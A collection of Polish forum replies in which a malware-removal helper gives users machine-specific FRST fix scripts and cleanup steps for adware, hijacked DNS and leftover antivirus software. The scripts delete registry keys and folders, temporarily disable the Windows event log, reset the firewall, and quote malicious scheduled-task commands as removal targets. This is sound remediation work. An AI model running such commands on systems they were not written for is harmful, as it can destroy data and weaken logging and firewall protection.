picasso

Fixy pomyślnie przetworzone. Kończymy w standardowy sposób: Użyj narzędzie DelFix, następnie zaktualizuj Java 8 Update 73 do najnowszej wersji: KLIK.

Fix FRST pomyślnie wykonany. Zaś te komunikaty Winsock widoczne w logu FRST do zignorowania. Wpisy nie są uszkodzone, komunikat pochodzi z faktu że FRST zakłada iż użycie zmiennej %SystemRoot% jest stanem domyślnym, a Twoje wpisy używają zamiast zmiennej statycznej ścieżki C:\Windows. Na koniec: 1. Zastosuj DelFix. Następnie wyczyść foldery Przywracania systemu. Operacje opisane w tym temacie: KLIK. 2. Do wykonania kompleksowa aktualizacja Windows. Stan fatalny: brak SP1, IE11 i wielu innych łat, a także zablokowane aktualizowanie systemu. Do załadowania będzie około kilkaset aktualizacji. Platform: Windows 7 Home Premium (X64) Język: Polski (Polska) Internet Explorer Wersja 8 (Domyślna przeglądarka: FF)

Odgrzebując stary zaległy temat: Tak, identyfikator nadal w rejestrze, gdyż testowałam tylko deaktywację tego dostawcy, a nie jego permanentne usuwanie. Deaktywacja nie pomogła, więc mam silne wątpliwości czy usunięcie klas z dostawców logowania coś wskóra, ale na wszelki wypadek spróbuj: 1. Do Notatnika wklej: Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B}" C:\Users\USER\Desktop\cred1.reg Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B}" C:\Users\USER\Desktop\cred2.reg Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B}" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B}" /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie USERa powinny też pojawić się dwa pliki cred1.reg + cred2.reg, będące kopią zapasową usuwanych wpisów. 2. Zresetuj system i podaj czy są zmiany.

1. Skoro usunięcie F-Secure (na razie nie potwierdzone jak bardzo kompletne) nie przyniosło skutku, odinstaluj także Avast. Następnie uruchom narzędzie Avast Uninstall Utility. 2. Został uruchomiony GMER, więc konieczna też weryfikacja czy transfer dysku nie obniżył się do PIO. Instrukcje w sekcji Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 3. Spróbuj uruchomić system w trybie normalnym. Niezależnie od tego czy operacja się uda, zrób nowe raporty FRST z opcji Skanuj (Scan), ponownie zaznacz pole Addition, by powstały dwa logi. Shortcut nie jest potrzebny.

Wszystko zrobione. Widzę, że Pandy też się pozbyłeś. Jeszcze drobne poprawki, ale aż dwa skrypty, gdyż usunięcie Dziennika zdarzeń wpiętego przez Pandę wymaga tymczasowego wyłączenia usługi Dziennik zdarzeń. 1. Otwórz Notatnik i wklej w nim: ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AvastUI.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PSUAMain RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Documents and Settings\radeczek\Dane aplikacji\Panda Security RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Panda Security RemoveDirectory: C:\Program Files\Panda Security CMD: sc config Eventlog start= disabled Reboot: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. System może się dłużej uruchamiać oraz mogą się pojawić skutki uboczne w postaci np. odcięcia od sieci, ale to stan tymczasowy. Powstanie kolejny fixlog.txt. Skopiuj go do innego folderu, bo kolejne podejście go nadpisze. 2. Otwórz Notatnik i wklej w nim: C:\WINDOWS\system32\config\Nano.evt CMD: sc config Eventlog start= auto Reboot: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie kolejny fixlog.txt. 3. Przedstaw oba pliki fixlog.txt.

Zadania usuwające poprawnie wykonane. Minimalna poprawka. Otwórz Notatnik i wklej w nim: URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Wszystkie widoczne infekcje zostały pomyślnie usunięte. Jeśli masz problemy obecnie z płynnością, przyczyna jest inna, nie infekcja. 1. Wstępnie sprawdź czy na czystym rozruchu (redukcja uruchomionych usług) jest jakaś zmiana: KLIK. 2. Jest tu edycja Windows 8.1 (X64). Czy planujesz aktualizację do Windows 10? 3. Być może trzeba będzie kontynuuować diagnostykę w dziale Hardware. Nie wiem skąd informacje o "niebezpiecznym" VulcanInfo. To nowy składnik instalacji sterowników nVidia: KLIK, KLIK.

Chodziło tylko o dostarczenie pliku fixlog, reszta logów już została dodana w poprzednim poście i duplikaty usuwam. Przy przeklejaniu do Notatnika pomyłiłeś się i w pierwszej komendzie obciąłeś literkę: CloseProcesses:. Prawie wszystkie zadania wykonane. Kolejna porcja czynności: 1. Zamieszanie z profilami Firefox. Operacje nie zostały wykonane zgodnie z tym co zadałam. Miał być zresetowany bieżący profil oraz usunięty drugi. Natomiast został usunięty nie ten profil co zadałam i zmienił się bieżący który miał być resetowany. Do wykonania reset Firefox dla tego profilu: 2. Otwórz Notatnik i wklej w nim: S1 bsdriver; \??\C:\WINDOWS\system32\drivers\bsdriver.sys [X] S3 esgiguard; \??\C:\Program Files (x86)\Enigma Software Group\SpyHunter\esgiguard.sys [X] C:\spyhunter.fix C:\shldr.mbr C:\Program Files (x86)\Enigma Software Group C:\Users\Amelka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Amelka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Amelka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\qksee.lnk C:\WINDOWS\system32\Drivers\EsgScanner.sys CMD: fltmc instances Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. 3. Było tu też fałszywe Google Chrome. Poproszęjeszcze o szukanie w rejestrze na powiązany ciąg rejestru. Uruchom FRST, w polu Szukaj wklej co podane poniżej i klik w Szukaj w rejestrze. Dostarcz wynikowy log. eAHPeNhIUJ 4. Jak mówiłam, jest tu też uszkodzony plik Windows jscript9diag.dll. Uruchom sfc /scannow i dostarcz przefiltrowany raport: KLIK.

W tej sytuacji w punkcie 1 przejdź w Tryb awaryjny Windows i skorzystaj z narzędzia Avast Uninstall Utility.

AdwCleaner wykonał zadanie. Natomiast: Naprawa nie grzebała w tym obszarze (a usuwane obiekty o nazwie "SpaceSoundPro" to adware, a nie komponenty dźwiękowe). Klawisz z flagą Windows + X > Menedżer urządzeń > odinstaluj urządzenia związane z dźwiękiem i zresetuj komputer. Windows powinien przebudować je od nowa. Podaj czy pojawiły się pożądane zmiany.

Sponsorowane przekierowania Yahoo pochodzą z instalacji adware SafeFinder, po użyciu AdwCleaner nadal pozostały resztki - załadowany proces Quotenamron.exe. Nie za bardzo jednak rozumiem, do czego zmierzasz z Avastem - program jest tu w pełni zainstalowany (wpis na liście deinstalacji i kompletny majdan instalacyjny), wspólnie z Pandą. Czy mam rozumieć, że nie można go normalnie odinstalować? 1. Przez Dodaj/Usuń programy odinstaluj Avast lub Pandę. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: C:\Documents and Settings\All Users\Dane aplikacji\Quotenamron C:\Documents and Settings\All Users\Dane aplikacji\Quotenamrons C:\Documents and Settings\All Users\Dane aplikacji\DCHP C:\Documents and Settings\radeczek\Dane aplikacji\*.* C:\Program Files\Common Files\Icecom C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{916AA324-DE55-4493-AA14-214686A0C287} DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes SearchScopes: HKLM -> DefaultScope - brak wartości FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension Reg: reg query HKLM\SYSTEM\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries /s EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. Menu Historia > Wyczyść całą historię przeglądania. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

1. Uruchom AdwCleaner ponownie, tym razem wybierz po kolei opcje Skanuj + Usuń. Dostarcz wynikowy log z czyszczenia. 2. Otwórz Notatnik i wklej w nim: RemoveDirectory: H:\AdwCleaner RemoveDirectory: H:\FRST\Quarantine RemoveDirectory: H:\Documents and Settings\Wojtek\Pulpit\Stare dane programu Firefox RemoveDirectory: H:\Program Files\Mozilla Firefox\extensions RemoveDirectory: H:\Program Files\Mozilla Firefox\plugins Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

1. AdwCleaner znalazł drobne klucze adware w rejestrze. Uruchom go ponownie, po kolei wybierz opcje Skanuj + Usuń. Gdy program ukończy czyszczenie: 2. Usń używane narzędzia za pomocą DelFix. Następnie wyczyść foldery Przywracania systemu. Obie akcje opisane tu: KLIK. 3. AdwCleaner wyraźnie wskazuje, że adware pochodzić mogło z "Asystenta pobierania" dobrychprogramów. Do wglądu wątek na co uważać: KLIK.

Proszę uruchamiaj FRST z Pulpitu (jak w pierwszym podejściu), a nie z folderu C:\FRST\Logs. Ten katalog Logs to archiwum logów i dostarczasz ich kopie, a nie bieżące pliki utworzone w danej rundzie przez FRST. Sprawa infekcji DNS nadal nie jest rozwiązana. Kolejne podejście: 1. Otwórz Notatnik i wklej w nim: Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173 Tcpip\..\Interfaces\{2780f41b-4ea8-4a45-9ef1-0ce5c9afbc09}: [DhcpNameServer] 82.163.143.171 Tcpip\..\Interfaces\{5a1e0f2b-42f3-4f82-8c58-5bda93dfd834}: [DhcpNameServer] 82.163.143.171 Tcpip\..\Interfaces\{fec9119d-8c9f-484b-adc2-ca4b012f847b}: [DhcpNameServer] 82.163.143.171 CMD: ipconfig /flushdns Reboot: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

sphere, to właśnie już miało być zrobione: vs.

Brakuje pliku fixlog.txt z wynikami skryptu usuwającego. Dołącz ten plik, jest w tym samym folderze skąd uruchamiałeś FRST. Nie uruchamiaj przypadkiem skryptu po raz drugi.

Oczywiście użytkownik nie może usuwać tematów, to funkcja moderatora/administratora. A GMER sobie już odpuść. Załączyć go pewnie nie możesz, bo nie zostały wykonane kroki zapisu raportu jak w przyklejonym (opcja Kopiuj a nie bezpośrednie zapisz) i próbujesz ładować plik o rozszerzeniu *.LOG a nie *.TXT.

Temat w nieodpowiednim dziale. Przenoszę do Windows. EDIT: Co to za duplikowanie tematów i usuwanie logów? Duplikat do śmieci, przywracam usunięte logi FRST. Nic dziwnego. System jest zmordowany oprogramowaniem zabezpieczającym, startują wspólnie Avast Free Antivirus i Bezpieczny Internet 2015 (modyfikacja F-Secure). Zacznij od deinstalacji tego drugiego (jest starszy), choć nie wiem czy da radę to wykonać w Trybie awaryjnym. Jeśli nie będzie się dało, to odinstaluj Avast, po tym wejście w tryb normalny i pozbycie się Bezpiecznego.

Brakuje trzeciego obowiązkowego pliku FRST Shortcut. Widać infekcję plików systemowych dnsapi.dll (przy okazji także uszkodzony jscript9diag.dll), szkodliwe procesy i inne elementy instalacji adware oraz wątpliwy skaner-naciągacz SpyHunter. Działania wstępne do przeprowadzenia: 1. Zastosuj narzędzie RepairDNS. Na Pulpicie powstanie raport RepairDNS.txt. 2. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj SpyHunter. Jeśli programu nie będzie się dało odinstalować, skorzystaj z narzędzia SpyHunterCleaner. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CMD: fltmc detach bsdriver c: bsdriver R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34720 2016-04-05] () R2 Idippicch; C:\Users\Amelka\AppData\Roaming\Jeiijdoe\Jeiijdoe.exe [174480 2016-04-05] () S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a S2 ktip; "C:\Program Files\ktip\ktip.exe" /s iid=6166472 did=APSFTuto4PC sid=11 ref=b490cf98-ca75-4a7d-4dc0-2d482b15d2ba-PolicyMac id=b2f57e148f4abea222d5c6496a3aef9c071b0ca53062305daeddda46a94c7f9b [X] S2 nytuqelezbt; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\knsd6865.tmpfs [X] S2 Odapt; "C:\Users\Amelka\AppData\Roaming\GiljuAdei\Jotraom.exe" -cms [X] S2 rijufoze; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\hnswA382.tmp [X] S2 rocufyky; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\jnsc8B74.tmp [X] S2 zigipyro; C:\Users\Amelka\AppData\Local\4C4C4544-1459853606-4810-8059-B7C04F314B31\qnsh6099.tmp [X] HKLM\...\Run: [spaceSoundPro] => "C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe" HKLM\...\Run: [iDSCCOMACE] => "C:\Program Files\SpaceSoundPro\idsccom_ACE.exe" HKLM\...\Run: [WINCOMEX7] => "C:\Program Files (x86)\sunnyday\wincom_EX7.exe" HKLM\...\Run: [iDSCCOMC33] => "C:\Program Files (x86)\Hostify\idsccom_C33.exe" HKLM\...\Run: [WINCOM5WV] => "C:\Program Files (x86)\sunnyday\wincom_5WV.exe" HKLM\...\Run: [iDSCCOMSGZ] => "C:\Program Files\SpaceSoundPro\idsccom_SGZ.exe" HKLM\...\Run: [iDSCCOM8IZ] => "C:\Program Files (x86)\Hostify\idsccom_8IZ.exe" HKLM-x32\...\Run: [apphide] => C:\Program Files (x86)\badu\uc.exe HKLM-x32\...\Run: [app] => C:\Program Files (x86)\badu\sys.exe HKLM-x32\...\Run: [sun21] => [X] BootExecute: autocheck autochk * sh4native Sh4Removal Task: {05FCEAEE-4C4B-4619-94D3-34FF1BF3EA71} - System32\Tasks\{0BB202A7-A1FF-45E7-89B2-533BCA656A58} => pcalua.exe -a "C:\Program Files\SpaceSoundPro\uninstaller.exe" Task: {107A63E9-C930-4015-8039-4F6DD3550450} - System32\Tasks\Savjy => C:\PROGRA~1\SERBIH~1\Koiqaed.bat Task: {1CDE0D8C-D449-477C-AE5F-31852B646DBF} - System32\Tasks\psv_Freeair => /c regedit.exe /s "C:\ProgramData\Konksolex\Redranit.reg" & del "C:\ProgramData\Konksolex\Redranit.reg" & SCHTASKS /Delete /TN "psv_Freeair" /F Task: {21139857-62C8-4E7E-B2AA-A030D79673AB} - System32\Tasks\psv_Zaamsolojob => /c regedit.exe /s "C:\ProgramData\Konksolex\Ranron.reg" & del "C:\ProgramData\Konksolex\Ranron.reg" & SCHTASKS /Delete /TN "psv_Zaamsolojob" /F Task: {40ED9B1E-A879-40FE-ADA8-93D7EA4DF853} - System32\Tasks\{C321EFD5-7986-4087-960B-903A6BC0EB89} => pcalua.exe -a C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31\Uninstall.exe -d C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31 Task: {44164B37-F2F6-42FB-A9BA-30E33A553A5F} - System32\Tasks\Browser Updater Task(Core) => C:\Program Files (x86)\QQBrowser\Update\Download\595B027AFE614670DDA14F95DD7814BB\Update\BrowserUpdate.exe Task: {B9630AC6-39A1-4FFA-AB31-1031023AE232} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe Task: {CDB6849E-455A-46EA-9BAD-FE35B89ED289} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe [2016-03-29] () Task: {D0F61A61-B7C5-4E62-A01D-B33DC98E08AE} - System32\Tasks\psv_Zotair => /c regedit.exe /s "C:\ProgramData\Konksolex\Y--Fax.reg" & del "C:\ProgramData\Konksolex\Y--Fax.reg" & SCHTASKS /Delete /TN "psv_Zotair" /F Task: {D28425C8-CAAA-4401-8A55-DC07140C0BF1} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe Task: {D840E53A-D7E9-467B-A8A1-F525B6C86036} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Amelka\AppData\Roaming\Mozilla\Firefox\Profiles\to8bbm4r.default\extensions\arthurj8283@gmail.com CHR HomePage: Default -> search.mpc.am CHR StartupUrls: Default -> "search.mpc.am" C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31 C:\Program Files (x86)\eAHPeNhIUJ C:\Program Files (x86)\SearchesToYesbnd C:\Program Files (x86)\WinTaske C:\ProgramData\CloudPrinter C:\ProgramData\Konksolex C:\ProgramData\Konksolexs C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31 C:\Users\Amelka\AppData\Local\Tempfolder C:\Users\Amelka\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} C:\Users\Amelka\AppData\LocalLow\Company C:\Users\Amelka\AppData\Roaming\*.* C:\Users\Amelka\AppData\Roaming\eCyber C:\Users\Amelka\AppData\Roaming\GiljuAdei C:\Users\Amelka\AppData\Roaming\Jeiijdoe C:\Users\Amelka\AppData\Roaming\MCorp C:\Users\Amelka\AppData\Roaming\WinZiper C:\Users\Amelka\Downloads\*-dp*.exe C:\Users\Amelka\Downloads\*spyhunter* C:\Users\Amelka\Downloads\free-videos C:\Users\Amelka\Downloads\PerdanaKun_-_SpyHunter_4.3 C:\Users\Amelka\Downloads\SpyHunter_4.17.6.4336 [Eng] patch C:\Users\Public\Documents\eAHPeNhIUJ C:\WINDOWS\AF54923662584AC6A0435B5B89C6EB61.TMP C:\WINDOWS\system32\log C:\WINDOWS\system32\taz C:\WINDOWS\system32\Drivers\bsdriver.sys C:\WINDOWS\system32\Drivers\cherimoya.sys C:\WINDOWS\system32\Drivers\etc\hp.bak C:\WINDOWS\SysWOW64\findit.xml C:\WINDOWS\SysWOW64\sh4native.exe C:\WINDOWS\SysWOW64\Number of results Folder: C:\Users\Amelka\Documents\setup Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMACE /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMC33 /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMSGZ /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SpaceSoundPro /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOM8IZ /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v app /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v apphide /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WizzWifiHotspot /f CMD: ipconfig /flushdns CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść przeglądarki z adware: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. Menu Historia > Wyczyść całą historię przeglądania. Wyłącz Firefox. Następnie klawisz z flagą Windows + R > w polu uruchom wklej komendę "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -p i ENTER. W menedżerz profilów skasuj drugi nieużywany profil. Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 5. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pola Addition i Shortcut, by powstały trzy logi. Dołącz też pliki fixlog.txt i RepairDNS.txt. Wypowiedz się czy nadal są jakieś problemy.

To nie ma żadnego związku z infekcją. Są tu tylko nieaktywne mini szczątki adware, które w żaden sposób nie mogą być powiązane. Logi FRST nie nadają się też do diagnostyki sprzętowej. Temat przenoszę do właściwego działu Hardware. Dane wymagane działem: KLIK. PS. Dopiero gdy zostanie rozwiązany problem główny, możesz wykonać drobne czyszczenie ze spoilera. Nie zajmuj się tym teraz, bo jest to akcja poziomu kosmetycznego i strata czasu w diagnostyce głównej.

Wszystko pomyślnie wykonane. Drobne poprawki + sprawdzenie dziwnego odczytu Winsock widocznego w raporcie FRST: Otwórz Notatnik i wklej w nim: SearchScopes: HKU\S-1-5-21-1728362779-2423392276-1017299573-1001 -> DefaultScope {ielnksrch} URL = FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [brak pliku] FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [brak pliku] RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\McAfee RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AcerSystem CMD: del /q C:\AVScanner.ini CMD: del /q "C:\Users\Jaco\AppData\Roaming\Microsoft\Windows\SendTo\Znajomy Xfire.lnk" Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg query HKLM\SYSTEM\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries /s Reg: reg query HKLM\SYSTEM\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64 /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Ale ja w ogóle nie ruszam drukarki HP. Zalecony do deinstalacji program "Badanie mające na celu poprawę produktów HP Deskjet 2540 series" to zbędny program kolekcjonujący dane o sytemie i wysyłający raporty w eter. Kompletnie zbędny do obsługi drukarki. Był uruchamiany GMER. Sprawdź czy transfer dysku nie obniżył sę do PIO. Instrukcje w ustępie Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. Po wykonaniu tych działań daj znać czy nastąpiła poprawa, gdyż może pakietu G Data nie trzeba usuwać. PS. Fix FRST wprawdzie wykonany, ale trochę nie zgadzają się wyniki (braki obiektów które wcześniej były). Zostały do wykonania tylko mini poprawki, ale to potem, bo nie jest to aż tak istotne.

Komentarze do starego tematu: LowcaAndroidow 1. Nie dołączyłeś w skrypcie usuwania katalogów PriceFountain z dysku. Jeden z nich widać w następujących sekcjach: ==================== Jeden miesiąc - utworzone pliki i foldery ======== 2016-02-20 11:07 - 2016-02-20 11:07 - 00000000 ____D C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers ==================== Załadowane moduły (filtrowane) ============== 2016-02-20 05:01 - 2016-02-20 05:01 - 00356864 _____ () C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers\SuspiciouslyMarketplace.dll 2. Czynności związane z Firefox zbędne i wykreślam z Twojej instrukcji. Przeglądarka nie była w ogóle zainstalowana (brak wykrytego profilu w FRST, brak wejścia instalacyjnego w Addition, brak skrótów w Shortcut). Klucze Mozilla i MozillaPlugins widziane w raporcie FRST są tworzone "na zapas" przez aplikacje, niezależnie od tego czy w ogóle przeglądarka kiedykolwiek była instalowana. 3. Poniższe pliki były poprawne. To pliki Samsunga związane prawdopodobnie z raportami pod konfigurację BIOS. C:\ProgramData\MakeMarkerFile.exe C:\ProgramData\MakeMarkerFile.xml Buckfast O ile w systemie nie nastąpiły już zmiany które mam na myśli, poprawki (strony wp.pl po "Asystencie pobierania" dobrychprogramów, katalogi PriceFountain, szczątki odinstalowanej Opery i puste skróty). Otwórz Notatnik i wklej w nim: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 HKU\S-1-5-21-4118013680-3836196915-2330699128-1001\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 SearchScopes: HKU\S-1-5-21-4118013680-3836196915-2330699128-1001 -> DefaultScope {3CD242FD-3221-4896-B3F0-1AB473ED083A} URL = SearchScopes: HKU\S-1-5-21-4118013680-3836196915-2330699128-1001 -> {3CD242FD-3221-4896-B3F0-1AB473ED083A} URL = Task: {2D6ADD23-BA7A-4976-A28B-55E97BA76C52} - System32\Tasks\Opera scheduled Autoupdate 1452859431 => C:\Program Files (x86)\Opera\launcher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PL-2303 USB-Serial Driver C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sea of Destiny Frost Fall C:\Users\jakub-zegarlicki\AppData\Local\JanetSatiated C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą 